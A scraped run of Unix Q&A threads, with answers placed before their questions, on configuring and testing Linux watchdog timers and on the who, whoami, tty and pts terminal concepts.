[Tue Dec 10 21:12:48 2019] IPMI Watchdog: driver initialized
$ ls -l /dev/watchdog
crw------- 1 root root 10, 130 Dec 10 21:12 /dev/watchdog
$ .. and finally started the watchdog daemon which based on the /var/log/watchdog/heartbeat file is writing to /dev/watchdog with 5s interval. In addition, one can confirm this with strace:
$ ps -p 2296 -f
UID PID PPID C STIME TTY TIME CMD
root 2296 1 0 01:28 ? 00:00:00 /usr/sbin/watchdog
$ sudo strace -y -p 2296
strace: Process 2296 attached
restart_syscall(<... resuming interrupted nanosleep ...>) = 0
write(1</dev/watchdog>, "\0", 1) = 1
write(1</dev/watchdog>, "\0", 1) = 1
open("/proc/uptime", O_RDONLY) = 2</proc/uptime>
close(2</proc/uptime>) = 0
write(1</dev/watchdog>, "\0", 1) = 1
write(1</dev/watchdog>, "\0", 1) = 1
write(1</dev/watchdog>, "\0", 1) = 1
write(1</dev/watchdog>, "\0", 1) = 1
write(1</dev/watchdog>, "\0", 1) = 1
nanosleep({5, 0}, NULL) = 0
write(1</dev/watchdog>, "\0", 1) = 1
write(1</dev/watchdog>, "\0", 1) = 1
open("/proc/uptime", O_RDONLY) = 2</proc/uptime>
close(2</proc/uptime>) = 0
write(1</dev/watchdog>, "\0", 1) = 1
write(1</dev/watchdog>, "\0", 1) = 1
write(1</dev/watchdog>, "\0", 1) = 1
write(1</dev/watchdog>, "\0", 1) = 1
write(1</dev/watchdog>, "\0", 1) = 1
nanosleep({5, 0}, NULL) = 0
write(1</dev/watchdog>, "\0", 1) = 1
write(1</dev/watchdog>, "\0", 1) = 1
open("/proc/uptime", O_RDONLY) = 2</proc/uptime>
close(2</proc/uptime>) = 0
write(1</dev/watchdog>, "\0", 1) = 1
write(1</dev/watchdog>, "\0", 1) = 1
write(1</dev/watchdog>, "\0", 1) = 1
write(1</dev/watchdog>, "\0", 1) = 1
write(1</dev/watchdog>, "\0", 1) = 1
nanosleep({5, 0}, ^Cstrace: Process 2296 detached
<detached ...>
$watchdog daemon above with PID 2296 was started in a way that heartbeat-file option in /etc/watchdog.conf was commented out in order to reduce the write system calls in the output of strace.
However, the server still reboots with roughly 300s intervals.
Why isn't the watchdog daemon able to reset the hardware watchdog timer on Supermicro X9DR3-F motherboard?
|
watchdog daemon unable to reset hardware watchdog timer on Supermicro X9DR3-F motherboard
|
Attach a debugger to the systemd process. This will pause it until you detach.
# gdb -p 1
|
I have configured systemd to use hardware watchdog. My kernel version is 5.10
This is the configuration
RuntimeWatchdogSec=120 in /etc/systemd/system.conf
WatchdogDevice=/dev/watchdog1I can see that the systemd is kicking the hw watchdog and the system is running fine.
I need to test if this hw watchdog indeed resets the hardware so I need to make systemd stop kicking it at run time.
Is this possible ?
I am not able to kill the systemd process.
|
How to make systemd to stop kicking the hardware watchdog
|
I've changed my kernel configuration to this:
CONFIG_WATCHDOG=y
CONFIG_SOFT_WATCHDOG=m
CONFIG_AT91SAM9X_WATCHDOG=yNow my watchdog timer was running. I only had to edit /etc/watchdog.conf in order to set up tests.
|
I'm struggling with the watchdog timer (wdt) for a while. I can't get it working.
My microcontroller is a AriaG25, based on the AT91SAM925. I have used this tutorial to compile the kernel. The kernel settings related to the wdt looks like this:
CONFIG_WATCHDOG=y
CONFIG_AT91SAM9X_WATCHDOG=y The kernel has been compiled without problem and boots succesfully. I've installed the watchdog deamon software via apt-get. And now I'm stuck. How do I get the watchdog working? I read a lot about /dev/watchdog. I don't have that file. Do I have to put the driver for my hardware there? Is this a driver?
|
How enable watchdog?
|
My personal favorite is earlyoom (included and enabled by default in Fedora 32): https://github.com/rfjakob/earlyoom
Otherwise you can choose from:Nohang: https://github.com/hakavlad/nohang
oomd: https://github.com/facebookincubator/oomd
low-memory-monitor: https://gitlab.freedesktop.org/hadess/low-memory-monitor/
psi-monitor: https://github.com/endlessm/eos-boot-helper/tree/master/psi-monitorEdit 2021-12-21:Modern distros with systemd now include a built-in OOM killer called systemd-oomd, check man systemd-oomd for more details.
|
I have the following situation - I've got a remote PC with an encrypted drive. If the PC needs a restart, I need to be physically present to enter the decryption password because I don't have any way of ssh-ing to it before the OS is loaded.
With this in mind, I use the PC to run my jupyter notebook. Only problem is, sometimes, I end up executing a piece of code which quickly consumes all available memory - 32G and then machine becomes unresponsive and that's it for my access to it.
I remember at uni, writing a C program which in a loop launched itself within itself - basically a RAM hog. The program got killed by a watchdog daemon before eating up all available memory and crashing the PC. What can I do to achieve this? Play around with ulimit? This seems too simple.
Thanks to Artem's suggestion, I found this about the solution he has proposed. Seems earlyoom will do the trick.
https://www.reddit.com/r/linux/comments/d2nssy/a_userspace_outofmemory_killer_oomd_020_released/
|
Memory watchdog for hungry applications
|
This is a known Debian bug. The systemd integration of the Debian watchdog package has gone through several rounds, varying quite wildly. The watchdog package that went out as Debian 8 was actually non-functional, as you have discovered. That wasn't picked up by pre-release testing.
The bug has been fixed for version 5.15-1 of the package, alongside another fix that corrects faulty service unit syntax (also visible in your service unit). This version is not available in Debian 8 backports, although two requests have been made (and apparently ignored) for it to be.
Further readingPaul Menzel (2016-09-19). Syntax error in systemd service file. Bug #838305. Debian bug tracker.
Uwe Storbeck (2014-11-05). watchdog does not start at boot. Bug #768168. Debian bug tracker.
Andreas Steinel (2015-07-22). Not starting automatically on freshly installed Jessie. Bug #793309. Debian bug tracker.
Michael Meskes (2016-02-26). Accepted watchdog 5.15-1 (source amd64) into unstable. debian-devel-changes.
|
I am trying to enable the watchdog service (on Raspbian Jessie).
I have installed watchdog and (hopefully) configured it.
sudo systemctl start watchdog seems to start it OK
systemctl status watchdog.service shows it running:-
● watchdog.service - watchdog daemon
Loaded: loaded (/lib/systemd/system/watchdog.service; static)
Active: active (running) since Mon 2017-02-20 15:52:46 AEDT; 22s ago
Process: 1828 ExecStart=/bin/sh -c [ $run_watchdog != 1 ] || exec /usr/sbin/watchdog $watchdog_options (code=exited, status=0/SUCCESS)
Process: 1824 ExecStartPre=/bin/sh -c [ -z "${watchdog_module}" ] || [ "${watchdog_module}" = "none" ] || /sbin/modprobe $watchdog_module (code=exited, status=0/SUCCESS)
Main PID: 1831 (watchdog)
CGroup: /system.slice/watchdog.service
└─1831 /usr/sbin/watchdogWhen I try to enable it with sudo systemctl enable watchdog I get this strange output
Synchronizing state for watchdog.service with sysvinit using update-rc.d...
Executing /usr/sbin/update-rc.d watchdog defaults
Executing /usr/sbin/update-rc.d watchdog enable
The unit files have no [Install] section. They are not meant to be enabled
using systemctl.
Possible reasons for having this kind of units are:
1) A unit may be statically enabled by being symlinked from another unit's
.wants/ or .requires/ directory.
2) A unit's purpose may be to act as a helper for some other unit which has
a requirement dependency on it.
3) A unit may be started when needed via activation (socket, path, timer,
D-Bus, udev, scripted systemctl call, ...).Trying sudo update-rc.d watchdog enable did not seem to be successful either
systemctl list-units | grep watchdog
cat /lib/systemd/system/watchdog.service indeed has no [Install] section
[Unit]
Description=watchdog daemon
Conflicts=wd_keepalive.service
After=multi-user.target
OnFailure=wd_keepalive.service[Service]
Type=forking
EnvironmentFile=/etc/default/watchdog
ExecStartPre=/bin/sh -c '[ -z "${watchdog_module}" ] || [ "${watchdog_module}" = "none" ] || /sbin/modprobe $watchdog_module
ExecStart=/bin/sh -c '[ $run_watchdog != 1 ] || exec /usr/sbin/watchdog $watchdog_options'
ExecStopPost=/bin/sh -c '[ $run_wd_keepalive != 1 ] || false'[Install]How can I debug this, and get watchdog to run on bootI added the following to /lib/systemd/system/watchdog.service
[Install]
WantedBy=multi-user.targetwatchdog now starts. I will need to test to ensure that it works!
|
Problem with systemd starting watchdog
|
The software watchdog option is now in Device Drivers->Watchdog Timer Support->Software watchdog
It can be a bit tedious to search for the location of certain options in the menuconfig but it actually took me less than a minute to find it.
|
I need use the watchdog, but I can't find any watchdog device. It means I need softdog? But I use modprobe softdog it still does not work. So I download the new Kernel 4.10.10. But I don't know how to find the sofedog modules. Just like this.
So where I can find the softdog modules?
|
I can't find the /dev/watchdog
|
I have fixed it using sdnotify-proxy. I changed my starting command for this:
/usr/local/bin/sdnotify-proxy /run/my-sd.sock \
/usr/bin/docker run -t --name my-container --volume /run/my-sd.sock:/run/my-sd.sock \
--env NOTIFY_SOCKET=/run/my-sd.sock --privileged my
|
So I've been configuring this Docker setup to run a simple service on Linux. The service uses the systemd watchdog and the sdnotify python library to ensure the service doesn't freeze. My problem is that the notify doesn't seem to get out of the docker VM to systemd and the watchdog always timeout. Here's my service:
[Unit]
Description=My Service
After=docker.service
Requires=docker.service
StartLimitIntervalSec=0[Service]
Type=simple
Restart=always
RestartSec=1
WatchdogSec=190
TimeoutStartSec=0
NotifyAccess=all
User=root
WorkingDirectory=/root
ExecStartPre=-/usr/bin/docker stop my-container
ExecStartPre=-/usr/bin/docker rm my-container
ExecStartPre=-/bin/bash docker_build.sh
ExecStart=/bin/bash docker_start.sh[Install]
WantedBy=multi-user.targetI start the container using:
docker run -t --name my-container --privileged my-serviceMy dockerfile looks like this:
FROM python:3.6.9# Open MQTT and HTTPS ports
EXPOSE 443 8883COPY requirements.txt requirements.txt
RUN python -m pip install -U -r requirements.txtCMD python -u -m service_moduleOutput:
May 05 13:31:55 DIET bash[11155]: [SO][Build Date]: 0.1-V-20200122h13:09
May 05 13:31:55 DIET bash[11155]: [SYS][INFO][17:31:55]: Serial port opened on: /dev/ttyS1
May 05 13:31:56 DIET bash[11155]: [GOOGLE][INFO][17:31:56]: Sent message: {'ip': ['x'], 'versions': {}, 'temperature': 37.793, 'cpu': 15.1, 'memory': 47.7, 'net': {'out': 7.95, 'in': 95.587}}
May 05 13:33:37 DIET systemd[1]: my.service: Watchdog timeout (limit 3min 10s)!
May 05 13:33:37 DIET systemd[1]: my.service: Killing process 11155 (bash) with signal SIGABRT.
May 05 13:33:37 DIET systemd[1]: my.service: Killing process 11157 (docker) with signal SIGABRT.
May 05 13:33:37 DIET systemd[1]: my.service: Main process exited, code=killed, status=6/ABRT
May 05 13:34:53 DIET bash[11155]: [GOOGLE][INFO][17:34:53]: Sent message: {'ip': ['x'], 'versions': {}, 'temperature': 33.916, 'cpu': 0.9, 'memory': 47.8, 'net': {'out': 9.882, 'in': 6.336}}The notify is sent when the '[GOOGLE][INFO]' lines are shown. There is only about 2 minutes between the first one and the timeout meaning it never got reset. Thanks in advance !
EDIT: Running this service outside of docker works properly.
|
Systemd Watchdog & Notify through Docker
|
So I was able to achieve the software watchdog.
By doing this.
#include <systemd/sd-daemon.h>sd_notify(0,"READY=1"); //in my constructorsd_notify(0,"WATCHDOG=1"); // in my timer every 10 seconds.
|
I am using an embedded linux environment. I have created a service which starts a qt application.
[Unit]
Description=AutoStart App[Service]
Type=simple
ExecStartPre=/home/root/Clean_Application.sh
ExecStart=/home/root/Startup_Script.sh
WatchdogSecs=10min
NotifyAccess=all
Restart=always
StartLimitInterval=5min
StartLimitBurst=4
StartLimitAction=reboot-force[Install]
WantedBy=multi-user.targetThen I try to reset the timer by running the following steps.
export NOTIFY_SOCKET=/run/systemd/notifysystemd-notify READY=1I then get the MAINPID by using the systemctl status command,
set the MAINPID with systemd-notify MAINPID=$PID
and try to reset the timer by running
systemd-notify WATCHDOG=1I have tried every combination of this setup but nothing resets the timer. I tried changing type=notifyand running systemd-notify "WATCHDOG=1" but nothing seems to work.
How can I troubleshoot this script?
|
Unable to reset systemd watchdog timer
|
It looks like the watchdog is still running when the kernel tries to reboot, and the system still fails to reboot. That indicates a possible firmware/hardware issue: when the kernel stops running, the watchdog should eventually (typically within 10 minutes) force the system to reboot even if the kernel fails to trigger it in the normal way.
If the exact model is Asus VivoMini UN45, here is a list of BIOS updates for it. When you select "Show all" on that page, you'll see that many of the updates have a comment "Improve system stability". If you have a version that is older than one of those updates, updating the BIOS might very well fix your problem.
To know your current BIOS version, run sudo dmidecode -s bios-version. With Asus PCs and motherboards, this command should report a four-digit number that corresponds to the versions listed on the Asus support page for that specific model.
|
My machine sometimes does not properly reboot. I am not sure what triggers it to work or not work. It happens sometimes both during automatic reboots when unattended-upgrades tries to reboot as well as during manual reboot (sudo shutdown -r now).
It seems the machine will stop the services but not actually perform the hardware reboot in the end. If I connect a screen, the last system messages displayed are:
[timestamp] watchdog: watchdog0 did not stop
[timestamp] reboot: Restarting systemI know that it is not just a delay issue, it will stay like this for days and not reboot.OS: Debian GNU/Linux 9 (stretch)
Kernel: Linux 4.9.0-8-amd64 #1 SMP Debian 4.9.110-3+deb9u4 (2018-08-21) x86_64 GNU/Linux
Hardware: Asus VivoMini Intel N3000Any ideas what might be wrong?
|
Reboot sometimes hangs [closed]
|
Create a systemd service unit as described here and be sure to include the line "Restart=always". Systemd is the Arch equivalent of upstart. A minimal configuration would look like:
[Service]
ExecStart=<full path to script>
Restart=alwaysYou may need to invoke the interpreter directly and provide your script as an argument depending on the shebang used in your script.
|
I would like a method as described here to set a watchdog to keep a python script alive, but in archlinux.
Thanks
EDIT
Solved using the example provided by smokes2345. I created a python_script.service in /etc/systemd/system/ with the following content:[Service]
Type=simple
ExecStart=/home/fernando/PycharmProjects/get_tweets/get_tweets.py
Restart=always
|
Watchdog for py script in archlinux
|
After my investigations, I figured out that linux kernel does not disable the watchdog on boot, but it actually uses a timer to reset the watchdog. and when the kernel oops or panics it's still reseting the watchdog so the system won't restart by watchdog timer overflow.
Following this answer for this question from man proc:/proc/sys/kernel/panic
This file gives read/write access to the kernel variable panic_timeout. If this is zero, the kernel will loop on a panic; if nonzero it indicates that the kernel should autoreboot after this number of secondsIt is obvious that a nonzero value should be passed to this file. According to this answer, to pass a value to /proc/sys/kernel/panic we should modify /etc/sysctl.conf and add parameter kernel.panic = 3 for 3 seconds of wait before restarting after a kernel panic occurred.
But that did not fix my problem. By investigating other panic related issued I found from man proc:/proc/sys/kernel/panic_on_oops (since Linux 2.5.68)
This file controls the kernel's behavior when an oops or BUG is encountered. If this file contains 0, then the system tries to continue operation. If it con-
tains 1, then the system delays a few seconds (to give klogd time to record the oops output) and then panics. If the /proc/sys/kernel/panic file is also
nonzero then the machine will be rebooted.And my problem was not a panic, but a kernel oops! So by adding kernel.panic_on_oops = 1 to /etc/sysctl.conf, /proc/sys/kernel/panic_on_oops flag is changed to 1. and now whenever the kernel stops, it restarts after 3 seconds.
|
We know that by opening /dev/watchdog the watchdog activates and by sending a character in less that a minute it will reset. the instructions are here.
The processor used for BBB AM335x enables its internal watchdog by default. But when the U-Boot or Ubuntu starts, this watchdog is disabled. and after OS is booted up the /dev/watchdog can be used.
I want to ensure that the watchdog works even when U-Boot or kernel can't boot. So how can it be done?The kernel and U-Boot should not disable the watchdog timer.
The default timeout of watchdog should be more than a minute before U-Boot starts the kernel so that the OS can boot up completelyI need to mention that Changing some parts of U-Boot code or Linux kernel code is acceptable. but External watchdog is not an option.
|
Enable watchdog timer of BeagleBone Black which works even if os could not boot
|
A tty is a native terminal device, the backend is either hardware or kernel emulated.
A pty (pseudo terminal device) is a terminal device which is emulated by an other program (example: xterm, screen, or ssh are such programs). A pts is the slave part of a pty.
(More info can be found in man pty.)
Short summary:
A pty is created by a process through posix_openpt() (which usually opens the special device /dev/ptmx), and is constituted by a pair of bidirectional character devices:The master part, which is the file descriptor obtained by this process through this call, is used to emulate a terminal. After some initialization, the second part can be unlocked with unlockpt(), and the master is used to receive or send characters to this second part (slave).
The slave part, which is anchored in the filesystem as /dev/pts/x (the real name can be obtained by the master through ptsname() ) behaves like a native terminal device (/dev/ttyx). In most cases, a shell is started that uses it as a controlling terminal.
|
Possible Duplicate:
What is the exact difference between a 'terminal', a 'shell', a 'tty' and a 'console'? I always see pts and tty when I use the who command but I never understand how they are different? Can somebody please explain me this?
|
Difference between pts and tty
|
Yes it's a joke, included in by the developers of the who command. See the man page for who.
excerptIf FILE is not specified, use /var/run/utmp. /var/log/wtmp as FILE is common. If ARG1 ARG2 given, -m presumed: 'am i' or 'mom likes' are usual.This U&L Q&A titled: What is a "non-option argument"? explains some of the terminology from the man page and my answer also covers alternatives to who .. .... commands.
Details
There really isn't anything special about am I or am i. The who command is designed to return the same results for any 2 arguments. Actually it behaves as if you called it with its -m switch.
-m only hostname and user associated with stdinExamples
$ who -m
saml pts/1 2014-01-06 09:44 (:0)
$ who likes candy
saml pts/1 2014-01-06 09:44 (:0)
$ who eats cookies
saml pts/1 2014-01-06 09:44 (:0)
$ who blah blah
saml pts/1 2014-01-06 09:44 (:0)Other implementations
If you take a look at The Heirloom Project, you can gain access to an older implementation of who.The Heirloom Toolchest is a
collection of standard Unix utilities.
Highlights are:Derived from original Unix material released as Open Source by Caldera and
Sun.The man page that comes with this who in this distribution also has the same "feature", except it's more obvious.
$ groff -Tascii -man who.1 |less
...SYNOPSIS
who [-abdHlmpqRrstTu] [utmp_file]
who -q [-n x] [utmp_file]
who [am i]
who [am I]
...
...
With the two-argument synopsis forms `who am i' and `who am I', who
tells who you are logged in as.
...
...
|
I stumbled across a blog that mentioned the following command.
who mom likesIt appears to be equivalent to
who am i The author warns to never enter the following into the command line (I suspect he is being facetious)
who mom hatesThere is nothing documented about the mom command. What does it do?
|
Is `who mom likes` a real linux command?
|
Do as booting to graphical.target way.
ps -el |grep -v ?
F S UID PID PPID C PRI NI ADDR SZ WCHAN TTY TIME CMD
4 S 0 683 1 0 80 0 - 4867 - tty1 00:00:00 agetty
4 S 0 901 686 1 80 0 - 63109 - tty7 00:00:10 Xorg
0 S 1000 2390 2388 0 80 0 - 7368 - pts/0 00:00:00 bash
0 R 1000 2465 2390 0 80 0 - 3935 - pts/0 00:00:00 ps
0 S 1000 2466 2390 0 80 0 - 4446 - pts/0 00:00:00 grep1.tty7 and tty1-tty6
it is a kind of virtual terminal such as tty1-tty6.
proof1:in the output info ps -el |grep -v ?,in the third line----tty7.
Proof2:man chvt
chvt - change foreground virtual terminal.
You can switch between tty1-tty7 with sudo chvt n (n's range from 1 until 7.)
tty7,belong to tty family,is a knind of vertual terminal ,and is in a gui mode,differing from tty1-tty6 which are in text mode.
2.pts
pts means pesudo tty slave which is used with the pseudo terminal master.
To get the pts structure of telnet session from web page
Description of a telnet session
in Figure 4: Description of a telnet session.When bash (ps,grep) run on Xorg in my example,the pts structure is smoething like the below graph(enlightened by R.Koula,author of Description of a telnet session)The controlling terminal for bash(ps,grep) is pts/0.
3.:0
w
09:36:09 up 24 min, 1 user, load average: 0.11, 0.25, 0.29
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
debian8 :0 :0 09:12 ?xdm? 5:13 0.13s /usr/bin/lxsessps -lC lxsession
F S UID PID PPID C PRI NI ADDR SZ WCHAN TTY TIME CMD
4 S 1000 1585 1574 0 80 0 - 91715 - ? 00:00:00 lxsessionFrom ps -lC lxsession it is obvious that lxsession is a daemon which has no controlling terminal,so w can't yield info such as ttynumber(from 1 till 7) or pts/number.
w yield :0 ,meaning local:display #0 ,to describe the fact on the hardware side,Xorg runing at local:display #0.
|
Please help me to distinguish pts from gui mode generated from tty.
booting to multi-user.target
I did this:sudo systemctl set-default multi-user.target
reboot
login with regular user debian8
ctrlaltf2 and login with regular user debian8 too.
run startx to switch into gui
run tty and who, which said:$ tty
/dev/pts/0
$ who
debian8 tty1 2017-01-09 20:22
debian8 tty2 2017-01-09 20:23Why is the output of who not this instead?who
debian8 tty1 2017-01-09 20:22
debian8 :0 2017-01-09 20:23
I have run startx to enter into gui mode, and tty said pts/0. So why does who output tty2 not :0?
My confusion after the explanation by KusalanandaWhen tty is run, we get /dev/pts/0. But look at the above. In the TTY column of the output of w the row for startx says tty2. Why6 is not :0?
What is the difference between /dev/pts/0 and tty ?
The tty2 output when I start X with xinit /etc/X11/xinit/xinitrc -- /etc/X11/xinit/xserverrc :0 vt2 -auth /tmp/serverauth.451rqHm1NC — is it a pts or not? It outputs$ tty
/dev/pts/0
This says that the tty here is a pts, I think.
booting to graphical.target
I did this:sudo systemctl set-default graphical.target
reboot
login with regular user debian8
run tty, yielding$ tty
/dev/pts/0
ctrlaltf2 and login with regular user debian8 too.
run tty, yielding$ tty
/dev/pts/1
run wThere are two guis. They can be switched between with ctrlaltf1 and ctrlaltf2.
Running the command tty, both terminals say /dev/pts/0 or /dev/pts/1. But look at the output of w above. Why does the terminal column for /usr/bin/lxsession -s LXDE -e LXDE say :0? And why does the terminal column for xinit /etc/X11/xinit/xinitrc -- /etc/X11/xinit/xserverrc :1 vt2 -auth /tmp/serverauth.k7JPJJEAHJ say tty2?
What is the difference between pts and tty and :0?
|
What is the difference between **pts** and **tty** and **:0**?
|
I am logging in as root in my shell and typing who and this is the output.
who
root tty1 2014-08-25 14:01 (:0)
root pts/0 2014-09-05 10:22 (:0.0)
root pts/3 2014-09-19 10:08 (xxx.xxx.edu)It effectively shows all the users that have established a connection.
ssh ramesh@hostnameRunning who again will result in another entry for the user ramesh.
who
root tty1 2014-08-25 14:01 (:0)
root pts/0 2014-09-05 10:22 (:0.0)
root pts/3 2014-09-19 10:08 (xxx.xxx.edu)
ramesh pts/4 2014-09-19 12:11 (xxx.xxx.edu)Inside the root shell, I just do su ramesh and then run whoami. It will give me the current user, ramesh, as the output.
Effectively, who gives the list of all users currently logged in on the machine and with whoami you can know the current user who is in the shell.
|
The man page description of who command is
who - show who is logged on
But there exists a similar command whoami. The man page description of whoami is
whoami - print effective userid
Can anyone explain what exactly these commands do ? How are they different from each other ?
|
Difference between who and whoami commands
|
id reportsthe current credentials of its own process; or
the credentials of a named user, as read out of the system account database.whoami reports the current credentials of its own process.
who and w report the active login sessions table from the login database.BSD doco notes that whoami does a subset of the job of id, and that id renders it obsolete.
A system does not have to have an active login sessions table. On Linux operating systems and on the BSDs, if the table has not been created at bootstrap, or has been deleted since, the system will operate without one. Logging in and out does not implicitly create it on Linux operating systems, moreover.
Furthermore, the table need not be readable by unprivileged users and neither the who nor the w command will report this as an error.
Further readingJonathan de Boyne Pollard (2018). The Unix login database. Frequently Given Answers.
Jonathan de Boyne Pollard (2018). "login-update-utmpx". User Commands. nosh toolset.
Lennart Poettering et al. (2018). systemd-update-utmp.service. systemd manual pages. Freedesktop.org.
Is it necessary for a login-shell to create utmp entry?
https://unix.stackexchange.com/a/409036/5132
|
In command line platforms online, like for instance the one on Codecademy, when I run
for cmd in w who whoami id
do
echo $cmd
$cmd
echo =========================
echo " "
doneI get
w
00:52:54up8days,14:10,0users,loadaverage:3.78,2.98,2.69
USERTTYFROMLOGIN@IDLEJCPUPCPUWHAT
=========================who
=========================whoami
ccuser
=========================id
uid=1000(ccuser)gid=1000(ccuser)groups=1000(ccuser)
=========================Note thatonly whoami and id output something. When I run the same thing on my computer, I see similar results for all commands.
Why doesn't Codecademy display the user for w and who? What's different about these commands?
|
Different outputs for `w`, `who`, `whoami` and `id`
|
After reading Centimane's comment on /var/run/utmp and searching differently, I found this fedora forum thread, which mentioned the issue is provoked by a bug in GDM, which creates a bad entry in /var/run/utmp. Eventually I even found a bug report for it and another here.
|
In a RHEL 7.3 server, I was trying to find logged-in users. I ran w and it told me there were two users, but it only showed me the info of one (myself); then I ran who, which displayed the other user as (unknown). Finally, I ran lastlog, with which's output I could match the log in date and port from who's output and find the unknown user actually is gdm.
$ w
09:33:36 up 4 days, 15:22, 2 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
myusr pts/0 172.16.23.113 09:32 0.00s 0.06s 0.03s w$ who
(unknown) :0 2017-07-01 18:13 (:0)
myusr pts/0 2017-07-06 09:32 (172.16.23.113)$ lastlog
Username Port From Latest
...
gdm :0 Sat Jul 1 18:13:23 -0500 2017
...The server is a supermicro machine and from time to time I connect to it using IPMI2's kvm over lan feature. But I don't remember anything weird happening when connecting like that.
This doesn't seem normal. What could have happened?
|
who shows (unknown) user logged-in: what's going on?
|
The -T and --message switch mean that who will display a +, -, or ? denoting whether the user is allowing messages to be written to their terminal.
`--writable'
After each login name print a character indicating the user's
message status: `+' allowing `write' messages
`-' disallowing `write' messages
`?' cannot find terminal deviceExample
$ who --message
saml - tty1 2013-11-03 16:09 (:0)
saml + pts/0 2013-11-03 16:10 (:0.0)
saml + pts/1 2013-11-03 16:49 (:0.0)
saml + pts/6 2013-11-04 12:28 (:0.0)
saml + pts/20 2013-11-05 13:16 (:0.0)
saml + pts/43 2013-11-05 16:58 (:0.0)The -T switch does the same thing.
What are messages?
Messages is a facility in Unix where people can write messages directly into someone else's terminal device.
Example
$ write
usage: write user [tty]saml on tty1 has his message receive capability disabled (-).
$ write saml tty1
write: saml has messages disabled on tty1However user saml is allowing messages on pts/0:
$ write saml pts/0
holaIf I switch over to the tab that corresponds to pts/0:
[saml@grinchy ~]$
Message from saml@grinchy on pts/43 at 17:06 ...
holaEnabling/Disabling the status
You can use the command mesg to enable and disable this feature in a given terminal.
Messages is enabled.
$ who --message | grep "pts/0"
saml + pts/0 2013-11-03 16:10 (:0.0)Turn it off.
$ mesg nNow it's disabled.
$ who --message | grep "pts/0"
saml - pts/0 2013-11-03 16:10 (:0.0)
|
I found the following in man who:-T, -w, --mesg add user's message status as +, - or ?
--message same as -T
--writablesame as -TSo looked up info who and found-w -T --mesg --message --writable After each login name print a character indicating the user's message status
+ allowing 'write' messages
- disallowing 'write' messages
? 'cannot find terminal device'Question: What 'message', which kind of 'message' is meant?
|
'who --message' -> which message?
|
It's easier to just do it with sort: who | sort -u -k1,1The -u flag asks for "unique" lines (suppress duplicates). The key flag (-k) says to only consider the first word in each line for purposes of sorting and uniqueness.
|
I want to show the online users using the who command but I want to have a unique output and not show any duplicates. I piped the output into awk but I am not very familiar with that, is this the right way and how to proceed?
|
Print unique of who command
|
Not necessarily. Either line 2 or 3 is the terminal (eg xterm) that you are using to run the ssh command.
Because it's the terminal, not the ssh connection.
Complete coincidence. If you consider a Windows user connecting to the server using PuTTY, they will not have a local pts and neither will they have the who command to run.You can try and run the following to see which pts the ssh command is running in:
ps -AF | grep sshYou should see a pts listed against the ssh command you are using to connect. This is the pts of the xterm (or KDE/Gnome terminal etc) that you are using to run ssh.
ssh itself is connecting to the server using TCP, which you can see using:
ss | grep ssh
|
After a ssh connection, if I run the who command on the server : I have this response :
olivia@olivia-pc:~$ who
olivia :0 2014-09-08 11:40 (:0)
olivia pts/0 2014-09-08 11:43 (:0)
olivia pts/10 2014-09-08 13:54 (sim.local)So it's easy to identify the incoming connection (third line).
If I run the who command on the client : I have this response :
who
sim :0 2014-09-04 16:30 (:0)
sim pts/10 2014-09-08 13:49 (:0)
sim pts/0 2014-09-08 13:46 (:0)So I think that the outgoing connection is the second line because it appears after that I connect to the server with ssh, but I don't understand why is it still there when I run who after that I have closed the connection (and until I leave the terminal).
So my questions are :
1) Is it really the second line that represents the outgoing connection and why?
2) Why is it still visible until I leave the terminal, even if I close the connection?
3) If the outgoing connection is the line two, as I except it to be, is there a reason that server and client use the same pseudo terminal number?
|
Identify the outgoing connection (ssh) with the who command
|
stty and older versions of who am i will issue error messages when they're not connected to a tty device. stty checks stdin (fd 0); I don't know what file descriptor who checks. To avoid getting those error messages, the usual workaround has been to use the -t option of test (more commonly known as [) to check if the shell is connected to a tty.
if [ -t 0 ]
then
ID=`who am i | awk '{print $1}'`
else
ID="unknown"
fiIn your case, you can surround the entire logic that sets up the PS1 variable in that if statement, since PS1 only makes sense when one is working on a tty.
The following is the relevant section from the explanation of test in the link above.-t file_descriptor
True if file descriptor number file_descriptor is open and is associated with a terminal. False if file_descriptor is not a valid file descriptor number, or if file descriptor number file_descriptor is not open, or if it is open but is not associated with a terminal.
|
I made some modifications to the /home/user/.envfile so the PS1 prompt would show date/time as well as the pwd etc.
The modification is:
# `who am i` is used to obtain the name of the original user
case `who am i | awk '{print $1}'` in
'someuser')
#set the prompt to include the date and time
set -o allexport
unset _Y _M _D _h _m _s
eval $(date "+_Y=%Y;_M=%m;_D=%d;_h=%H;_m=%M;_s=%S")
((SECONDS = 3600*${_h#0}+60*${_m#0}+${_s#0}))
typeset -Z2 _h _m _s
_tsub="(_m=(SECONDS/60%60)) == (_h=(SECONDS/3600%24)) + (_s=(SECONDS%60))"
_timehm='${_x[_tsub]}$_h:${_m}'
_timehms='${_x[_tsub]}$_h:$_m:${_s}'
_timedhms=$_Y'/'$_M'/'$_D" "'${_x[_tsub]}$_h:$_m:${_s}'
_hn=`hostname`
typeset -u _hn
# `whoami` is used here to display the name of the 'su' user
_un=`whoami | awk '{print $1}'`
typeset -u _un
export PS1="$_timedhms
"'['$_un']'$_hn':${PWD#$HOME/} $ '
set +o allexport
;;
*)
;;
esacThe prompt should look like:
2014/08/07 11:08:24
[su'd username]hostname:/home/username $As you can see, this makes use of whoami to display the name of the current user in the prompt.
Certain processes we run through this account are complaining:
who: 0551-012 The process is not attached to a terminal.
Do not run who am i as a background process.
Usage: who [-AabdHilmpqrsTtuwX?] [am {i,I}] [utmp_like_file]Is there any way to prevent that modification from affecting this other process? Possibly by detecting when the process is not attached to a terminal?
|
Is there a way to prevent a non-terminal-attached process from executing 'who' inside my .envfile?
|
TL,DR: you probably want /proc/PID/loginuid, even though its behavior doesn't always match logname. But it doesn't work out of the box on all distributions. Note that my answer assumes Linux, it does not apply to other Unix variants.
I don't think you'll find a fully satisfactory answer because you don't have clear expectations from what logname does. On the one hand, you're currently using logname, which is based on utmp records —records that associate a user with a terminal, and which are updated at the good will of the terminal emulator (many don't). On the other hand, you expect that “the possibility to change the username should be limited to the superuser”. This is not the case with utmp records! As explained in the very comment thread you cite, utmp records work most of the time, but they can be faked.
Defining “the username that was used to log into the console” is problematic. It's clear enough in nominal cases, but there are many complicated cases. What happens if a user calls su and attaches to another user's screen session? What happens if a user attaches to another user's X11 or VNC session? How do you trace processes to terminals —what do you do about processes that have no controlling terminal?
